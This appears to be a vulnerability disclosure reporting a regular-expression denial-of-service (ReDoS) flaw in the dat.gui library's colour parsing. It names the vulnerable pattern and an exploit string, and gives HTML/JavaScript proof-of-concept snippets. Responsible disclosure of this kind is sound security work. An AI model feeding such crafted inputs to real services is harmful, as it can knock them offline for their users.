Type of Issue Potential Regex Denial of Service (ReDoS)
Description The vulnerable regular expression is located in
https:/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L61
https:/dataarts/dat.gui/blob/51d1a37b00326c232f34d9b80dc6dea2bec8595b/src/dat/color/interpret.js#L79
The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s*(.+)\s* and can be exploited with the following string
"rgb("+" " * 5000
You can execute the following code to reproduce ReDos
<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
var gui = new dat.gui.GUI();
var Options = function() {
this.color0 = "rgb( "; // CSS string
};
window.onload = function() {
var options = new Options();
gui.addColor(options, 'color0');
};
</script><script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
var gui = new dat.gui.GUI();
var Options = function() {
this.color0 = "rgba( "; // CSS string
};
window.onload = function() {
var options = new Options();
gui.addColor(options, 'color0');
};
</script>